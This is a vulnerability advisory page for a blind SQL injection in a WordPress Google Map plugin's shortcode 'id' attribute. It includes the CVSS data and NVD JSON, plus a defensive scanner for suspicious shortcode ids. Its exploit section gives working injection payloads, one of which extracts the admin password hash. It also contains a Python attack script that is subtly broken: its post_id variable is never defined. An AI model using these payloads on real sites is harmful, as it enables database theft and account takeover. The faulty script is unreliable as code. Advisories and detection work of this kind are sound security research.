Security Vulnerability Report
CVE-2025-11365 CVSS 6.5 MEDIUM

CVE-2025-11365

Published: 2025-10-15 09:15:43
Last Modified: 2026-04-15 00:35:42

Description

The WP Google Map Plugin plugin for WordPress is vulnerable to blind SQL Injection via the 'id' parameter of the 'google_map' shortcode in all versions up to, and including, 1.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WP Google Map Plugin <= 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
php
<?php
/**
 * CVE-2025-11365 - WP Google Map Plugin Blind SQL Injection PoC
 * Vulnerability: Blind SQL Injection via 'id' parameter in 'google_map' shortcode
 * Affected: WP Google Map Plugin <= 1.0
 * Required: Contributor-level WordPress access or above
 */

// PoC payload as WordPress shortcode content
// Inject this shortcode into a post or page using a Contributor-level account

// Time-based blind SQL injection payload
$payload_time_based = '[google_map id="1 AND (SELECT SLEEP(5))-- -"]';

// Boolean-based blind SQL injection payload (extracts database version)
$payload_boolean_based = '[google_map id="1 AND (SELECT CASE WHEN (SUBSTRING(@@version,1,1)=\'5\') THEN SLEEP(5) ELSE 0 END)-- -"]';

// Data extraction payload example (extracts admin password hash)
$payload_data_extraction = '[google_map id="1 UNION SELECT user_pass FROM wp_users WHERE ID=1-- -"]';

// Python exploit example using requests library
/*
import requests
import time

target_url = "http://target-wordpress-site.com"
username = "contributor_user"
password = "contributor_password"

# Step 1: Login to WordPress
session = requests.Session()
login_data = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'redirect_to': target_url + '/wp-admin/',
    'testcookie': '1'
}
session.post(target_url + '/wp-login.php', data=login_data)

# Step 2: Create a new post with the malicious shortcode
post_data = {
    'post_title': 'Test Post',
    'post_content': '[google_map id="1 AND IF(SUBSTRING(@@version,1,1)=\'5\',SLEEP(5),0)-- -"]',
    'post_status': 'publish',
    'post_type': 'post'
}
response = session.post(target_url + '/wp-admin/post-new.php', data=post_data)

# Step 3: Measure response time to confirm blind SQL injection
start_time = time.time()
response = session.get(target_url + '/?p=' + str(post_id))
elapsed_time = time.time() - start_time

if elapsed_time > 4:
    print("[+] Vulnerable! Response time: " + str(elapsed_time) + " seconds")
else:
    print("[-] Not vulnerable or patched")
*/

echo "PoC payloads generated.
Use Contributor-level account to inject shortcode into a post.\n";
echo "Time-based payload: " . $payload_time_based . "\n";
echo "Boolean-based payload: " . $payload_boolean_based . "\n";
?>
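
A defender-side audit for the flaw described above, as an added example that is not part of the plugin or of this report: it flags stored `google_map` shortcodes whose `id` attribute is anything other than a plain integer. The function names and the sample posts are constructed for illustration; the attribute syntax handled (double-quoted, single-quoted, bare) is the standard WordPress shortcode form.

```python
import re

# A [google_map ...] tag; group 1 is the raw attribute string.
SHORTCODE_RE = re.compile(r"\[google_map\b([^\]]*)\]", re.IGNORECASE)
# id="...", id='...' or bare id=value inside that attribute string.
ID_ATTR_RE = re.compile(
    r"""\bid\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'\]]+))""", re.IGNORECASE
)


def suspicious_map_ids(post_content):
    """Return id values of google_map shortcodes that are not plain integers."""
    findings = []
    for tag in SHORTCODE_RE.finditer(post_content):
        match = ID_ATTR_RE.search(tag.group(1))
        if match is None:
            continue  # shortcode without an id attribute
        # Exactly one of the three alternatives captured the value.
        value = next(g for g in match.groups() if g is not None)
        # A legitimate map id is a row key, so only digits are expected.
        if not re.fullmatch(r"\d+", value.strip()):
            findings.append(value)
    return findings


def scan_posts(posts):
    """Map post id -> list of non-integer shortcode ids found in its content."""
    report = {}
    for post_id, content in posts.items():
        bad = suspicious_map_ids(content)
        if bad:
            report[post_id] = bad
    return report


# Constructed sample rows standing in for wp_posts (ID -> post_content).
SAMPLE_POSTS = {
    101: 'Our office: [google_map id="3"]',
    102: "Route: [google_map id='7' width=400]",
    103: '[google_map id="1 AND (SELECT SLEEP(5))-- -"]',  # shape quoted on this page
    104: "Plain text that mentions google_map without a shortcode.",
    105: "[google_map id=2]",
}

if __name__ == "__main__":
    for post_id, values in scan_posts(SAMPLE_POSTS).items():
        print(f"post {post_id}: non-integer google_map id {values!r}")
```

In practice the input would be the `post_content` column of `wp_posts`, including drafts, pending posts and revisions.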

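References

https://plugins.trac.wordpress.org/browser/wp-google-map/trunk/shortcode.php#L8
https://www.wordfence.com/threat-intel/vulnerabilities/id/a8ecc765-ae00-4091-81dc-e93f91bbd86e?source=cve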

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11365", "sourceIdentifier": "[email protected]", "published": "2025-10-15T09:15:42.520", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Google Map Plugin plugin for WordPress is vulnerable to blind SQL Injection via the 'id' parameter of the 'google_map' shortcode in all versions up to, and including, 1.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-google-map/trunk/shortcode.php#L8", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a8ecc765-ae00-4091-81dc-e93f91bbd86e?source=cve", "source": "[email protected]"}]}}